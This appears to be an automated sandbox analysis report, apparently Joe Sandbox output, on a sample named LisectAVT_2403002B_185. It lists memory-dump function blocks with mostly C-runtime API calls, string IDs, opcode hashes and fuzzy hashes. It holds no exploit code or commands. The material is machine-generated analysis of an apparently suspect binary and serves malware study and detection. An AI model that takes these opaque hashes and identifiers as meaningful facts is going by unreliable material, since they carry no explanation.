                                                                  • Instruction Fuzzy Hash: 8121D8B1A01211ABCB21BB259C41A6F3B68AB51770B65093BE916B7390DB38ED01C7D9
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: Fgetc
                                                                  • String ID:
                                                                  • API String ID: 1720979605-0
                                                                  • Opcode ID: 99490034b1aea8aef9b95fe1c29fde60b3baa3331cfc9a247c1780cb42b3a02e
                                                                  • Instruction ID: 44aa58600d22d1484ad5273de6b28d525e24bd344581160757dfe4f750247ad6
                                                                  • Opcode Fuzzy Hash: 99490034b1aea8aef9b95fe1c29fde60b3baa3331cfc9a247c1780cb42b3a02e
                                                                  • Instruction Fuzzy Hash: BB619270D001089FCB04EBE5C951AFEB7B5AF44315F60C26EE41A7B281EB386E05CB99
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,0047CA41,0047B191,0047A6CA), ref: 0047CA58
                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0047CA66
                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0047CA7F
                                                                  • SetLastError.KERNEL32(00000000,0047CA41,0047B191,0047A6CA), ref: 0047CAD1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastValue___vcrt_
                                                                  • String ID:
                                                                  • API String ID: 3852720340-0
                                                                  • Opcode ID: daa11ed4997001d18b917a56470b8de52a5b4f4aee20373ff6126df693e6edc0
                                                                  • Instruction ID: 761d14fc8dfe8acffacca33c51bad345546958b6a4879969e07cc27f20c5035b
                                                                  • Opcode Fuzzy Hash: daa11ed4997001d18b917a56470b8de52a5b4f4aee20373ff6126df693e6edc0
                                                                  • Instruction Fuzzy Hash: BF01287251C2195EA72566757CC57AB3A58EB02379724823FF018802F0EF690C45934C
                                                                  APIs
                                                                  • _strrchr.LIBCMT ref: 00487CE0
                                                                  • _strrchr.LIBCMT ref: 00487CEA
                                                                  • _strrchr.LIBCMT ref: 00487CFF
                                                                    • Part of subcall function 00487531: RtlFreeHeap.NTDLL(00000000,00000000,?,004908E5,0047DE01,00000000,0047DE01,?,00490B86,0047DE01,00000007,0047DE01,?,0049107A,0047DE01,0047DE01), ref: 00487547
                                                                    • Part of subcall function 00487531: GetLastError.KERNEL32(0047DE01,?,004908E5,0047DE01,00000000,0047DE01,?,00490B86,0047DE01,00000007,0047DE01,?,0049107A,0047DE01,0047DE01), ref: 00487552
                                                                    • Part of subcall function 0048146A: IsProcessorFeaturePresent.KERNEL32(00000017,0048143C,?,?,?,?,00000000,?,?,?,004806BA,00000000,00000000,00000000,00000000,00000000), ref: 0048146C
                                                                    • Part of subcall function 0048146A: GetCurrentProcess.KERNEL32(C0000417), ref: 0048148F
                                                                    • Part of subcall function 0048146A: TerminateProcess.KERNEL32(00000000), ref: 00481496
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: _strrchr$Process$CurrentErrorFeatureFreeHeapLastPresentProcessorTerminate
                                                                  • String ID: .com
                                                                  • API String ID: 3694955208-4200470757
                                                                  • Opcode ID: dda2cc60fbf84f5d643cd6d9c7e9090d3a3a24ad8ff5e1a9d5fb4c3bec3e1b50
                                                                  • Instruction ID: baceb529c7d6802b2536516c71d671356677d1f69ddd0dcd059461c033b29092
                                                                  • Opcode Fuzzy Hash: dda2cc60fbf84f5d643cd6d9c7e9090d3a3a24ad8ff5e1a9d5fb4c3bec3e1b50
                                                                  • Instruction Fuzzy Hash: F9512A725086016ADB117A75DC62B7F36998F42368F350DAFF8049B282FA7DCD0183AC
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0047DBA3,?,?,004A95C4,00000000,?,0047DCCE,00000004,InitializeCriticalSectionEx,0049AC1C,InitializeCriticalSectionEx,00000000), ref: 0047DB72
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLibrary
                                                                  • String ID: api-ms-
                                                                  • API String ID: 3664257935-2084034818
                                                                  • Opcode ID: e282b245f85080a23d20f37bb880e7116789829a8cf45813e0fd2e81f508d3d5
                                                                  • Instruction ID: e841cfe22307bd4ac583fd0261d3eec3a9690505cb9ec9a75d19d55327f5ea04
                                                                  • Opcode Fuzzy Hash: e282b245f85080a23d20f37bb880e7116789829a8cf45813e0fd2e81f508d3d5
                                                                  • Instruction Fuzzy Hash: F711A731E11621ABDF224B6C9C45B9A37B4AF11770F264133E929F7280D668FD00C6DD
                                                                  APIs
                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,EF8D9AA4,0047EC9B,?,00000000,00498A03,000000FF,?,004837F2,CE3BFFFF,?,004837C6,?), ref: 0048388D
                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0048389F
                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00498A03,000000FF,?,004837F2,CE3BFFFF,?,004837C6,?), ref: 004838C1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                  • API String ID: 4061214504-1276376045
                                                                  • Opcode ID: 45c181cb017aa38ea9da8f2467586cdab0dca3544f11ddee309c93a3bf3ba744
                                                                  • Instruction ID: 741e07058ae7d883453b17e53a4b15e44af3957172ac4c6ee99ee54cfad0bb5f
                                                                  • Opcode Fuzzy Hash: 45c181cb017aa38ea9da8f2467586cdab0dca3544f11ddee309c93a3bf3ba744
                                                                  • Instruction Fuzzy Hash: 1701A231944655AFDB01AF54CC0ABAEBBB8FB05B11F04053BF821A2290DB789D04CB98
                                                                  APIs
                                                                  • __alloca_probe_16.LIBCMT ref: 0048C118
                                                                  • __alloca_probe_16.LIBCMT ref: 0048C1E1
                                                                  • __freea.LIBCMT ref: 0048C248
                                                                    • Part of subcall function 00489045: RtlAllocateHeap.NTDLL(00000000,0048F487,00000000,?,0048F487,00000220,?,?,00000000), ref: 00489077
                                                                  • __freea.LIBCMT ref: 0048C25B
                                                                  • __freea.LIBCMT ref: 0048C268
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1423051803-0
                                                                  • Opcode ID: 23eb302f081749e722508f8def47f48a83231cb5445baf05fde3155886be70fa
                                                                  • Instruction ID: ad28821e822e13565ef720e577b8ed10ef805eca525fa060fab06b8702c9f031
                                                                  • Opcode Fuzzy Hash: 23eb302f081749e722508f8def47f48a83231cb5445baf05fde3155886be70fa
                                                                  • Instruction Fuzzy Hash: 6651A672900206ABDB206EE5DCC1EBF37A9EF84B14F15496EFD0496291EA39DC508778
                                                                  APIs
                                                                  • std::ios_base::good.LIBCPMTD ref: 00476DD2
                                                                  • std::ios_base::getloc.LIBCPMTD ref: 00476E54
                                                                  • char_traits.LIBCPMTD ref: 00476EE8
                                                                  • std::ios_base::good.LIBCPMTD ref: 00476F7B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: std::ios_base::good$char_traitsstd::ios_base::getloc
                                                                  • String ID:
                                                                  • API String ID: 1920461149-0
                                                                  • Opcode ID: e6c01b9c200c1d1f4a3bebac45946b5545b44156d30396050fe725bf3d9fdac6
                                                                  • Instruction ID: b0b7815907560c05b61cb3ca3b26ca0c89b552c9b5dd002179b697b2909bad8a
                                                                  • Opcode Fuzzy Hash: e6c01b9c200c1d1f4a3bebac45946b5545b44156d30396050fe725bf3d9fdac6
                                                                  • Instruction Fuzzy Hash: A8515EB4E00609DFCB04DF95C992AFEBBB2BF44304F14815EE5196B392C738A945CB98
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: char_traits
                                                                  • String ID:
                                                                  • API String ID: 1158913984-0
                                                                  • Opcode ID: c514c0fa627b61a1c8003ed86a7b3539ec778a1c4e3ab9aee6972b40f7f844b2
                                                                  • Instruction ID: abe770bc106443ffddd83c97f9ef1a6f4522f43c99bdeb12fa36d6cf8c7783d7
                                                                  • Opcode Fuzzy Hash: c514c0fa627b61a1c8003ed86a7b3539ec778a1c4e3ab9aee6972b40f7f844b2
                                                                  • Instruction Fuzzy Hash: 4A31A6B5D00118ABCB04EBA1D8519FE777AAF80308F04C06FE54D5B242EB38DB45CBA5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: fG
                                                                  • API String ID: 0-698194293
                                                                  • Opcode ID: f773e4102896791e74d3c0e1372c67e2be3eb6d706e29aca73cf8715eefd37dc
                                                                  • Instruction ID: 9960a725ac369935c3b5993d2d1d0b61610aadfdd096b6b05403a51c3c1ecd75
                                                                  • Opcode Fuzzy Hash: f773e4102896791e74d3c0e1372c67e2be3eb6d706e29aca73cf8715eefd37dc
                                                                  • Instruction Fuzzy Hash: 6C11BC71600204AFE7117BFA9C4579E37D86F29728F95085FF60097291DFBC88418B6D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: `q$`q$`q$`q${
                                                                  • API String ID: 0-3581042392
                                                                  • Opcode ID: 9a3c223d592bf8a5262306d14ba298f801f08f18fbc4b79c1c6f0f97015c8c74
                                                                  • Instruction ID: 8a71fae29fe2a695c4703a8abd3470036b022fdb48fba9c239ca0851e284e967
                                                                  • Opcode Fuzzy Hash: 9a3c223d592bf8a5262306d14ba298f801f08f18fbc4b79c1c6f0f97015c8c74
                                                                  • Instruction Fuzzy Hash: 3EB1E478E013099FCF15DFA9E59099EBBF2FF88310B14862AD419AB315DB35A905CF90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: `q$`q$`q$`q${
                                                                  • API String ID: 0-3581042392
                                                                  • Opcode ID: 874b4cca8945fa824cc4e26794a139a12ea78f8949a7e4843e234396903117dc
                                                                  • Instruction ID: cbd9030a0fc8690aae0fd9c697401c4aaec69a53c2c6217c58be4b7b101506db
                                                                  • Opcode Fuzzy Hash: 874b4cca8945fa824cc4e26794a139a12ea78f8949a7e4843e234396903117dc
                                                                  • Instruction Fuzzy Hash: E0A1C474E013199FCF14DFA9D59099EBBF2FF88310B14862AD819AB314DB35A905CF90
                                                                  APIs
                                                                  • GetConsoleOutputCP.KERNEL32(EF8D9AA4,00000000,00000000,?), ref: 00486A8E
                                                                    • Part of subcall function 0048E621: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0048C23E,?,00000000,-00000008), ref: 0048E682
                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00486CE0
                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00486D26
                                                                  • GetLastError.KERNEL32 ref: 00486DC9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                  • String ID:
                                                                  • API String ID: 2112829910-0
                                                                  • Opcode ID: ce8dc8d7b0bd70b24dfe2a40d85dcd61e9a14ca4f8112513c31e44a69a2cb998
                                                                  • Instruction ID: 0b61d4fea6cc390da67f37a6d159744c02dd990c80279cc30bcec64f6d88b9bc
                                                                  • Opcode Fuzzy Hash: ce8dc8d7b0bd70b24dfe2a40d85dcd61e9a14ca4f8112513c31e44a69a2cb998
                                                                  • Instruction Fuzzy Hash: C4D1ACB5E002589FCF14DFA8C8809AEBBF5FF09314F29492EE856EB351D634A941CB54
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustPointer
                                                                  • String ID:
                                                                  • API String ID: 1740715915-0
                                                                  • Opcode ID: 5b337a42b91b35f901b84b3232167b0e1efecf90625fa092677d04006888803d
                                                                  • Instruction ID: 270e5967c68aa2e1cde5d48def9932674bad70fdc6f6a190516c75d7feabb19d
                                                                  • Opcode Fuzzy Hash: 5b337a42b91b35f901b84b3232167b0e1efecf90625fa092677d04006888803d
                                                                  • Instruction Fuzzy Hash: A651C2B26002069FDB2A8F51D882BFA77A4EF44314F14856FE80D47291E739EC51C798
                                                                  APIs
                                                                    • Part of subcall function 0048E621: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0048C23E,?,00000000,-00000008), ref: 0048E682
                                                                  • GetLastError.KERNEL32 ref: 0048EA03
                                                                  • __dosmaperr.LIBCMT ref: 0048EA0A
                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 0048EA44
                                                                  • __dosmaperr.LIBCMT ref: 0048EA4B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                  • String ID:
                                                                  • API String ID: 1913693674-0
                                                                  • Opcode ID: 703771247fa50bdb6c8ce6a480ded7b5aabfb280da06fa94c7224d5eb8b17d46
                                                                  • Instruction ID: 2a26ab35ecab45b875fd902bee64f1fe534683fe38a23d4a266d1fc827de640f
                                                                  • Opcode Fuzzy Hash: 703771247fa50bdb6c8ce6a480ded7b5aabfb280da06fa94c7224d5eb8b17d46
                                                                  • Instruction Fuzzy Hash: D921A171600215EF9B20BFA7C88182FB7A9FF55768B108C2FFA1997251D779EC408B58
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f96c0987b4e4300a809a90b475cb59c6d1d6f890db0216247f2ee721bc39ef0e
                                                                  • Instruction ID: 99ee4c4fbf30563b295e1256eca2b393571e27dab7bbb4ac0e9c1822485b8ea2
                                                                  • Opcode Fuzzy Hash: f96c0987b4e4300a809a90b475cb59c6d1d6f890db0216247f2ee721bc39ef0e
                                                                  • Instruction Fuzzy Hash: F721A4B1704205BFDB20BFB68E4092F77ADAF50368B104D2BF91497251E7B9EC5087A8
                                                                  APIs
                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0048F92F
                                                                    • Part of subcall function 0048E621: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0048C23E,?,00000000,-00000008), ref: 0048E682
                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0048F967
                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0048F987
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                  • String ID:
                                                                  • API String ID: 158306478-0
                                                                  • Opcode ID: 1fd18fb732a815901ae3434e0293666f2feac2cfc83e09ef23826a3a421bda82
                                                                  • Instruction ID: 756f390b6132a804ef0cd4be05ad2f4f33c775073e8ad57b1b6bf7af0add6fe0
                                                                  • Opcode Fuzzy Hash: 1fd18fb732a815901ae3434e0293666f2feac2cfc83e09ef23826a3a421bda82
                                                                  • Instruction Fuzzy Hash: 3411C4F25056157EA71137BA5C8AD7F2A9CDE59398760083BF901E1202FA2CDD0543B9
                                                                  APIs
                                                                  • WriteConsoleW.KERNEL32(00000000,00000000,0048112F,00000000,00000000,?,00492C8C,00000000,00000001,?,?,?,00486E1D,?,00000000,00000000), ref: 00496EF9
                                                                  • GetLastError.KERNEL32(?,00492C8C,00000000,00000001,?,?,?,00486E1D,?,00000000,00000000,?,?,?,004873F7,00000000), ref: 00496F05
                                                                    • Part of subcall function 00496ECB: CloseHandle.KERNEL32(FFFFFFFE,00496F15,?,00492C8C,00000000,00000001,?,?,?,00486E1D,?,00000000,00000000,?,?), ref: 00496EDB
                                                                  • ___initconout.LIBCMT ref: 00496F15
                                                                    • Part of subcall function 00496E8D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00496EBC,00492C79,?,?,00486E1D,?,00000000,00000000,?), ref: 00496EA0
                                                                  • WriteConsoleW.KERNEL32(00000000,00000000,0048112F,00000000,?,00492C8C,00000000,00000001,?,?,?,00486E1D,?,00000000,00000000,?), ref: 00496F2A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                  • String ID:
                                                                  • API String ID: 2744216297-0
                                                                  • Opcode ID: 87044671dbfa410a816ff6beecb45e61f7cf8437ae5ff07124fb27c92579257d
                                                                  • Instruction ID: 09b8d990958c5baad4d3ef3bc26677db5b31f41ac743d6be176380dd40128a6b
                                                                  • Opcode Fuzzy Hash: 87044671dbfa410a816ff6beecb45e61f7cf8437ae5ff07124fb27c92579257d
                                                                  • Instruction Fuzzy Hash: 86F0A236540125BBCF221FD9DC04D9A7F66EB193E1F15407AFA1995520C6368C209B99
                                                                  APIs
                                                                  • __startOneArgErrorHandling.LIBCMT ref: 0048268D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorHandling__start
                                                                  • String ID: pow
                                                                  • API String ID: 3213639722-2276729525
                                                                  • Opcode ID: 1ba753de017fcfa949a159318ba4930bf1ab8eccf4b3d8f7bc21549a1fc77f55
                                                                  • Instruction ID: a7fca9a0859e2154ae9c2412cb1e4da8f44d3c120ae409ddda30cf7a6e4a2966
                                                                  • Opcode Fuzzy Hash: 1ba753de017fcfa949a159318ba4930bf1ab8eccf4b3d8f7bc21549a1fc77f55
                                                                  • Instruction Fuzzy Hash: BB516671A0510297CB11771ACB0136F2B98AB50B00F248DBBF891423E9EB7C8CD29B4E
                                                                  APIs
                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0047C88F
                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0047C943
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
